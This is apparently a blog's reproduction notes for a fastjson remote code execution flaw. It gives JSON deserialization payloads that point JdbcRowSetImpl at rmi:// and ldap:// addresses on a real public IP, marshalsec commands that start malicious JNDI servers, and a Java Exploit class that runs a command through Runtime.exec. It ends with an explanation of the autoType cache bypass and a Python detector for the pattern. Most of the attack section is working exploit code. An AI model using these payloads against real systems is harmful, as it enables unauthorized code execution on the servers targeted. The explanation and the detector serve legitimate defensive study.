fastjson RCE vulnerability reproduction notes

Reference links:

https://paper.seebug.org/994/
https://www.cnblogs.com/jinqi520/p/11097779.html
https://xz.aliyun.com/t/5680

0x01 Vulnerability reproduction: RMI


1. Payload:

{
    "a": {
        "@type": "java.lang.Class",
        "val": "com.sun.rowset.JdbcRowSetImpl"
    },
    "b": {
        "@type": "com.sun.rowset.JdbcRowSetImpl",
        "dataSourceName": "rmi://106.12.201.224:1099/Exploit",
        "autoCommit": true
    }
}


2. Execute on ××× to start an RMI service:
java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.RMIRefServer "http://106.12.201.224/#Exploit"

  1. Generate and compile the *** script

Save the following code as Exploit.java,
then run javac Exploit.java to generate the class file.

import java.lang.Runtime;
import java.lang.Process;
public class Exploit {

    static {
        try {
            Runtime rt = Runtime.getRuntime();
            String[] commands = {"touch", "/tmp/success"};
            Process pc = rt.exec("ping fastjson.t00ls.7272e87394b4f7c0088c966cba58c1dd.tu4.org");
            pc.waitFor();
        } catch (Exception e) {
            // do nothing
        }
    }

}

0x02 Vulnerability reproduction: LDAP

1. Payload:

{
    "a": {
        "@type": "java.lang.Class",
        "val": "com.sun.rowset.JdbcRowSetImpl"
    },
    "b": {
        "@type": "com.sun.rowset.JdbcRowSetImpl",
        "dataSourceName": "ldap://106.12.201.224:1389/Exploit",
        "autoCommit": true
    }
}


2. Execute on ××× to start an LDAP service:
java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer "http://106.12.201.224/#Exploit"

  1. Generate and compile the *** script
    (Exploit.java, no package needs to be imported)

Save the following code as Exploit.java,
then run javac Exploit.java to generate the class file.

import java.lang.Runtime;
import java.lang.Process;
public class Exploit {

    static {
        try {
            Runtime rt = Runtime.getRuntime();
            String[] commands = {"touch", "/tmp/success"};
            Process pc = rt.exec("ping fastjson.t00ls.7272e87394b4f7c0088c966cba58c1dd.tu4.org");
            pc.waitFor();
        } catch (Exception e) {
            // do nothing
        }
    }

}

0x03 Vulnerability principle

The general idea is a bypass through java.lang.Class: deserializing a java.lang.Class value makes fastjson load the class named in "val" (here JdbcRowSetImpl) into its class mapping cache, and a class found in that cache is not subjected to the autoType check. The payload is therefore sent twice: the first request loads the class into the cache, the second one triggers execution. By default, as long as the class has not been loaded into the cache, checkAutoType throws an exception and aborts.

On the first request, the java.lang.Class deserializer loads the class through deserializers.findClass and puts JdbcRowSetImpl into the mapping; on the second request, the JdbcRowSetImpl class is found in that mapping, so the check is bypassed.
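The two-stage pattern described above can be recognised on the request side. The following detector is an added example and not code from the original post: it records class names preloaded through a java.lang.Class/"val" object, flags a later "@type" that reuses one of them, and flags any "dataSourceName" that points at a JNDI URL. The sample request bodies and the host attacker.example are constructed placeholders.

```python
import json
from urllib.parse import urlsplit

# Constructed sample bodies modelled on the page's payload (placeholder host).
PRELOAD = '{"a":{"@type":"java.lang.Class","val":"com.sun.rowset.JdbcRowSetImpl"}}'
TRIGGER = ('{"b":{"@type":"com.sun.rowset.JdbcRowSetImpl",'
           '"dataSourceName":"rmi://attacker.example:1099/Exploit","autoCommit":true}}')
BENIGN = '{"user":{"name":"alice","autoCommit":true}}'

# URL schemes that make JdbcRowSetImpl perform a JNDI lookup of a remote reference.
JNDI_SCHEMES = {"rmi", "ldap", "ldaps", "iiop"}

def walk(node):
    """Yield every JSON object (dict) in the body, depth-first."""
    if isinstance(node, dict):
        yield node
        for v in node.values():
            yield from walk(v)
    elif isinstance(node, list):
        for v in node:
            yield from walk(v)

def scan_body(body, preloaded):
    """Return (kind, value) findings for one request body.

    `preloaded` is per-source state: class names already seen in a
    java.lang.Class/"val" object, so the second request of the two-step
    cache bypass is recognised even though it never names java.lang.Class.
    """
    findings = []
    try:
        doc = json.loads(body)
    except ValueError:
        return findings          # not JSON: nothing for this detector to do
    for obj in walk(doc):
        t = obj.get("@type")
        if t == "java.lang.Class" and isinstance(obj.get("val"), str):
            preloaded.add(obj["val"])
            findings.append(("class-preload", obj["val"]))
        elif isinstance(t, str) and t in preloaded:
            findings.append(("preloaded-type-reuse", t))
        ds = obj.get("dataSourceName")
        if isinstance(ds, str) and urlsplit(ds).scheme.lower() in JNDI_SCHEMES:
            findings.append(("jndi-datasource", ds))
    return findings

def scan_session(bodies):
    """Scan bodies from one source in order, carrying preload state across them."""
    state, out = set(), []
    for b in bodies:
        out.append(scan_body(b, state))
    return out
```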


Source: blog.51cto.com/13770310/2425330